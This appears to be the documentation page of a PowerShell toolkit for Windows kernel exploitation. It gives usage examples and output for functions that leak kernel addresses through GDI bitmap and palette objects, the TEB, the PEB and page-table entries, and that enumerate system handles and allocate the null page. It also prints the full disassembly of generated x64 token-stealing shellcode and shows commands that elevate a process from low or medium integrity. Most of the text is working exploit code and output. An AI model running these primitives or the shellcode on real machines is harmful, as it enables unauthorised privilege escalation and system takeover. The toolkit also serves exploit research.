Over time I'll add PowerShell helper functions to assist in kernel exploitation.
# Byte buffer int/hex
$Buff = [Byte[]](0x41)*255 + [Byte[]](0x42)*0xff
# Buffer includes pointer
# Takes care of endianness, may need ".ToInt32()" or ".ToInt64()"
$Buff = [Byte[]](0x41)*255 + [System.BitConverter]::GetBytes($Pointer)
# Call VirtualFree to release
[IntPtr]$Pointer = [Kernel32]::VirtualAlloc([System.IntPtr]::Zero, $Bytes.Length, 0x3000, 0x40)
# (2) AllocHGlobal
[IntPtr]$Pointer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Bytes.Length)
[System.Runtime.InteropServices.Marshal]::Copy($Bytes, 0, $Pointer, $Bytes.Length)
$Val = [System.Runtime.InteropServices.Marshal]::ReadInt32($Address)
$Val = [System.Runtime.InteropServices.Marshal]::ReadInt64($Address)
# Pointer to PowerShell struct
$SomeStruct = New-Object SomeStruct
$SomeStruct_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($SomeStruct) # if needed
$SomeStruct = $SomeStruct.GetType()
$SystemPointer = New-Object System.Intptr -ArgumentList $Address
$Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SomeStruct)
# PowerShell struct to Pointer
$SomeStructSize = [System.Runtime.InteropServices.Marshal]::SizeOf($SomeStruct)
[IntPtr]$Pointer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SomeStructSize)
[system.runtime.interopservices.marshal]::StructureToPtr($SomeStruct, $Pointer, $true)
# You can loop this is a for or while to add entries to $Result
$Result = @()
$HashTable = @{
Element1 = "Val"
Element2 = "Val"
Element3 = "Val"
$Object = New-Object PSObject -Property $HashTable
$Result += $Object
$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle
$Timer = [diagnostics.stopwatch]::StartNew()
while ($Timer.ElapsedMilliseconds -lt 10000) {
$Runspace = [runspacefactory]::CreateRunspace()
$RaceCondition = [powershell]::Create()
$RaceCondition.runspace = $Runspace
# Do some stuff here
while ($true) {
# And/or do some stuff in a loop
$AscObj = $RaceCondition.BeginInvoke()
# Some condition to fulfill
# Kill the runspace
$WinVer = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\").ReleaseId
bcdedit /dbgsettings SERIAL DEBUGPORT:1 BAUDRATE:115200
Universal x64 Palette leak using HmValidateHandle. Includes tagTHREADINFO pointer to facilitate low integrity EPROCESS leak.
Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2, 10 RS3
PS C:\Users\b33f> Stage-HmValidateHandlePalette
tagTHREADINFO : -6813887409648
cEntries : -6813890109412
pFirstColor : -6813890109320
PaletteKernelObj : -6813890109440
PaletteHandle : 1007159191
PS C:\Users\b33f> $Manager = Stage-HmValidateHandlePalette
PS C:\Users\b33f> "{0:X}" -f $Manager.pFirstColor
Use NtQuerySystemInformation::SystemHandleInformation to get a list of open handles in the specified process.
Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2, 10 RS3
C:\PS> $SystemProcHandles = Get-Handles -ProcID 4
C:\PS> $Key = $SystemProcHandles |Where-Object {$_.ObjectType -eq "Key"}
C:\PS> $Key |ft
ObjectType AccessMask PID Handle HandleFlags KernelPointer
---------- ---------- --- ------ ----------- -------------
Key 0x00000000 4 0x004C NONE 0xFFFFC9076FC29BC0
Key 0x00020000 4 0x0054 NONE 0xFFFFC9076FCDA7F0
Key 0x000F0000 4 0x0058 NONE 0xFFFFC9076FC39CE0
Key 0x00000000 4 0x0090 NONE 0xFFFFC907700A6B40
Key 0x00000000 4 0x0098 NONE 0xFFFFC90770029F70
Key 0x00020000 4 0x00A0 NONE 0xFFFFC9076FC9C1A0
Pointer-Leak is a wrapper for various types of pointer leaks, more will be added over time.
NT kernel base leak through the TEB (by @Blomster81)
- Properties: Requires GDI primitive => LowIL compatible
- Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2, 10 RS3
PTE leak through nt!MiGetPteAddress (by @Blomster81 & @FuzzySec)
- Properties: RS1+ requires GDI primitive, NT Kernel base => LowIL compatible
- Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2, 10 RS3
# NT Kernel base leak
PS C:\Users\b33f> Pointer-Leak -GDIManager $ManagerBitmap.BitmapHandle -GDIWorker $WorkerBitmap.BitmapHandle -LeakType TebNtBase -GDIType Bitmap
KTHREAD : -35184359294848
TEBBase : 140699435483136
NtPointer : -8787002226668
NtBase : -8787003412480
# PTE leak
PS C:\Users\b33f> Pointer-Leak -GDIManager $Manager.PaletteHandle -GDIWorker $Worker.PaletteHandle -NtBase $NTLeak.NtBase -VirtualAddress 0xFFFFF78000000800 -LeakType MiGetPteAddress -GDIType Palette
PTEBase : -10445360463872
PTEAddress : -9913858260992
Generate x32/64 Kernel token stealing shellcode.
Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2
# x64 Win10 RS2
PS C:\Users\b33f> $sc = Get-KernelShellCode
PS C:\Users\b33f> Get-CapstoneDisassembly -Architecture CS_ARCH_X86 -Mode CS_MODE_64 -Bytes $sc
Address Instruction
------- -----------
0x100000 mov r9, qword ptr gs:[0x188]
0x100009 mov r9, qword ptr [r9 + 0x220]
0x100010 mov r8, 0x2dbc
0x100017 mov rax, r9
0x10001A mov rax, qword ptr [rax + 0x2e8]
0x100021 sub rax, 0x2e8
0x100027 cmp qword ptr [rax + 0x2e0], r8
0x10002E jne 0x10001a
0x100030 mov rcx, rax
0x100033 add rcx, 0x358
0x10003A mov rax, r9
0x10003D mov rax, qword ptr [rax + 0x2e8]
0x100044 sub rax, 0x2e8
0x10004A cmp qword ptr [rax + 0x2e0], 4
0x100052 jne 0x10003d
0x100054 mov rdx, rax
0x100057 add rdx, 0x358
0x10005E mov rdx, qword ptr [rdx]
0x100061 mov qword ptr [rcx], rdx
0x100064 ret
Gets the base of all loaded modules. For Low integrity this only works pre Win 8.1.
C:\PS> $Modules = Get-LoadedModules
C:\PS> $Modules[4]
ImageSize ImageName ImageBase
--------- --------- ---------
0x5C000 \SystemRoot\System32\drivers\CLFS.SYS -8246323585024
C:\PS> "{0:X}" -f $Modules[0].ImageBase
Universal x64 Bitmap leak using HmValidateHandle. Includes tagTHREADINFO pointer to facilitate low integrity EPROCESS leak.
Targets: 7, 8, 8.1, 10, 10 RS1, 10 RS2
PS C:\Users\b33f> Stage-HmValidateHandleBitmap |fl
tagTHREADINFO : -7693316289488
BitmappvScan0 : -7693315010480
BitmapKernelObj : -7693315010560
BitmapHandle : 419758522
PS C:\Users\b33f> $Manager = Stage-HmValidateHandleBitmap
PS C:\Users\b33f> "{0:X}" -f $Manager.BitmapKernelObj
Universal x32/x64 Bitmap leak using gSharedInfo.
Targets: 7, 8, 8.1, 10, 10 RS1
PS C:\Users\b33f> Stage-gSharedInfoBitmap |fl
BitmapKernelObj : -7692235059200
BitmappvScan0 : -7692235059120
BitmapHandle : 1845828432
PS C:\Users\b33f> $Manager = Stage-gSharedInfoBitmap
PS C:\Users\b33f> "{0:X}" -f $Manager.BitmapKernelObj
Universal x32/x64 Bitmap leak using PEB.
Targets: 7, 8, 8.1, 10
C:\PS> Stage-BitmapReadWrite
ManagerpvScan0 : -7692227456944
WorkerHandleTable : 767454567328
ManagerKernelObj : -7692227457024
PEB : 8757247991808
WorkerpvScan0 : -7692227415984
ManagerHandle : -737866269
WorkerHandle : 2080706172
GdiSharedHandleTable : 767454478336
ManagerHandleTable : 767454563656
WorkerKernelObj : -7692227416064
C:\PS> $BitMapObject = Stage-BitmapReadWrite
C:\PS> "{0:X}" -f $BitMapObject.ManagerKernelObj
A token stealing wrapper for x32/64 which ingests a handle to a manager and worker GDI object.
Note that this function has two methods, if supplied with a pointer to an arbitrary tagTHREADINFO object it can elevate the current process from low integrity. Without the tagTHREADINFO pointer it relies on NtQuerySystemInformation (Get-LoadedModules) to leak the base address of the ntkernel which requires medium integrity on Win8.1+.
# MedIL token theft
C:\PS> GDI-Elevate -GDIManager $ManagerBitmap.BitmapHandle -GDIWorker $WorkerBitmap.BitmapHandle -GDIType Bitmap
# LowIL token theft
C:\PS> GDI-Elevate -GDIManager $ManagerPalette.PaletteHandle -GDIWorker $WorkerPalette.PaletteHandle -GDIType Palette -ThreadInfo $ManagerPalette.tagTHREADINFO
Wrapper to allocate the process null page on Win 7 32bit.
# Read
PS C:\> $NullPage = Alloc-NullPage -Bytes 1024
PS C:\> if ($NullPage -eq $true) {...} else {...}
Allocate 32/64 bit shellcode and get a Syscall delegate for the memory pointer.
# Sample definition for NtWriteVirtualMemory
C:\PS> $NtWriteVirtualMemory = Get-SyscallDelegate -ReturnType '[UInt32]' -ParameterArray @([IntPtr],[IntPtr],[IntPtr],[int],[ref][int])
# Syscall ID = 0x37 (Win7)
C:\PS> $NtWriteVirtualMemory.Invoke([UInt16]0x37,[IntPtr]$hProcess,[IntPtr]$pBaseAddress,[IntPtr]$pBuffer,$NumberOfBytesToWrite,[ref]$OutBytes)
Returns fuzzed values for various types of integers with a preference for "beautiful"(?) values.
PS C:\Users\b33f> for ($i=0;$i-lt10;$i++) { Return-Int16 }
PS C:\Users\b33f> for ($i=0;$i-lt10;$i++) { "{0:X}" -f $(Return-UInt32) }
Returns 3 types of strings, AlphaNum, Full ASCII and Unicode. Needs wrappers to marshal strings as AnsiBStr, BStr, LPStr, LPTStr, LPWStr, TBStr and UNICODE_STRING.
PS C:\Users\b33f> Return-AlphaNum -Maxlen 200
PS C:\Users\b33f> Return-AlphaNum -Maxlen 200
PS C:\Users\b33f> Return-AlphaNum -Maxlen 200
PS C:\Users\b33f> Return-FullASCII
PS C:\Users\b33f> Return-FullASCII
PS C:\Users\b33f> Return-Unicode 500